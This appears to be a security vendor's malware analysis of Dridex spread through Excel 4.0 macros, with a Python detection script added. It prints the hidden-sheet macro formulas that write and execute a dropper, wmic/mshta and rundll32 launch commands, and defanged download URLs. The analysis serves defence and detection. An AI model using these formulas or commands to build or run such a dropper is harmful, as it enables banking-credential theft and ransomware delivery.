Dridex Distributed Through Excel 4.0 Macro

The ASEC analysis team has recently found that the method used to distribute Dridex via Excel files is changing more rapidly and more frequently. The team has been covering Dridex distribution methods on the ASEC blog since last year; the most recent related post, uploaded last month, described an Excel file that uses the task scheduler to distribute Dridex. The recently distributed Excel files use the Excel 4.0 macro instead of the VBA macro used in previous cases. We assume the attacker made this change to bypass detection, and the interval between changes of method is becoming shorter.

The following figures show the content of the Excel files currently being distributed. They use various images to trick users into clicking the Enable Macro button.

Content (1)
Content (2)
Content (3)

The macro that performs the malicious activity is an Excel 4.0 macro, not a VBA macro as in previous cases. When the macro is run, Auto_Open, which exists in a hidden sheet, automatically executes the formulas in the cells, and these formulas perform the malicious activity.

Auto_Open that exists in hidden sheet

Through Auto_Open, malicious formula macros are run in the following order, creating and running a malicious file.

  • Malicious Formula Macros
    =FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
    =FOR.CELL("HdOrvNpzIeLysqA",D160:AR521, TRUE)
    =FWRITE(B152,CHAR(HdOrvNpzIeLysqA))
    =NEXT()
    =FCLOSE(B152)
    =EXEC(GET.NOTE(Macro1!$A$4, 1, 200))

The malicious data used in this stage is spread across cells that have notes attached. The notes are hidden, but the Show/Hide Note feature reveals the malicious data. The data saved in the notes gives the path where the file is created and the command that runs it. The content of the created file is stored as decimal values in a cell range (D160:AR521).
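For triage, the chain above can be flagged statically once the macro-sheet formulas have been dumped to text. The following is an added example, not ASEC's code; the names `functions` and `triage` are hypothetical, and it assumes some extraction tool has already produced the formulas as strings.

```python
import re

# Formulas as listed in the post; in practice they would come from
# whatever tool you use to dump the cells of the macro sheet.
SAMPLE = [
    '=FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)',
    '=FOR.CELL("HdOrvNpzIeLysqA",D160:AR521, TRUE)',
    '=FWRITE(B152,CHAR(HdOrvNpzIeLysqA))',
    '=NEXT()',
    '=FCLOSE(B152)',
    '=EXEC(GET.NOTE(Macro1!$A$4, 1, 200))',
]
BENIGN = ['=SUM(A1:A10)', '=IF(B2>0,"ok","check")', '=CHAR(65)']  # constructed

# A name directly followed by "(" is a function call; dots are part of
# Excel 4.0 macro function names (GET.NOTE, FOR.CELL).
CALL = re.compile(r'([A-Z][A-Z0-9.]*)\s*\(', re.I)

def functions(formula):
    """Return the function names called in one formula, upper-cased, in order."""
    return [name.upper() for name in CALL.findall(formula)]

def triage(formulas):
    """Flag the write-a-file-then-execute chain described in the post."""
    calls = [functions(f) for f in formulas]
    flat = [name for row in calls for name in row]
    findings = {
        # The sheet opens a file and writes to it.
        'file_write': 'FOPEN' in flat and 'FWRITE' in flat,
        # Written bytes are rebuilt from numbers with CHAR().
        'char_decode_write': any('FWRITE' in r and 'CHAR' in r for r in calls),
        # Path or command is pulled from cell notes instead of a literal.
        'args_from_notes': any('GET.NOTE' in r for r in calls),
        'exec': 'EXEC' in flat,
    }
    # Order matters: a dropper writes the file before it calls EXEC.
    findings['drop_and_execute'] = (
        findings['file_write'] and findings['exec']
        and flat.index('FWRITE') < flat.index('EXEC')
    )
    return findings

if __name__ == '__main__':
    print(triage(SAMPLE))
    print(triage(BENIGN))
```

All five findings are true for the formulas from the post and false for the constructed benign sheet.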

The created malicious file is saved in the ProgramData folder with the sct extension and executed through the wmic command.

  • File Creation Path
    C:\ProgramData\fCLjKsEAHjoxErF.sct
  • File Execution Command
    wmic process call create 'mshta C:\ProgramData\fCLjKsEAHjoxErF.sct'

Malicious data hidden in notes
Malicious data in certain cells

Below is part of the code of the created sct file, which is obfuscated with many annotations. When the file is run, it creates an additional sct file in the ProgramData folder. The additional file is responsible for running the dll file that is created afterward.

Creating additional sct file

The file then attempts to connect to 5 URLs to download a malicious file and save it in the ProgramData folder with the dll extension. The downloaded dll was confirmed as Dridex.

  • Download URL
    hxxp://coldchallenge[.]xyz:8080/js/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/files/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/wp-heme/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/js/filler_dk9naf.png
    hxxps://space.egematey[.]com/wp-content/cache/wpfc-mobile-cache/proclus-the-quaestor/amp/j4a42p0W.php

Downloading Dridex

After downloading the malware, the file runs the additionally created sct file.

Running additionally created sct

The following shows a part of the code for the additionally created sct file. Once it is run, it executes the downloaded Dridex with the following command.

  • File Execution Command
    wmic process call create "rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI"

Executing Dridex

Dridex is banking malware that collects users' banking-related information. It can also download its main module through a loader to perform additional malicious behaviors. In the past, there have been cases where the malware distributed DoppelPaymer, BitPaymer, and CLOP ransomware. Because the Excel files that distribute Dridex keep changing, and files containing malicious macros are mainly distributed through spam mails, users should be cautious and refrain from opening files from unknown sources.

[File Detection]

  • Downloader/XLS.Dridex
  • Trojan/Win.BankerX-gen.R438509

 [IOC Info]

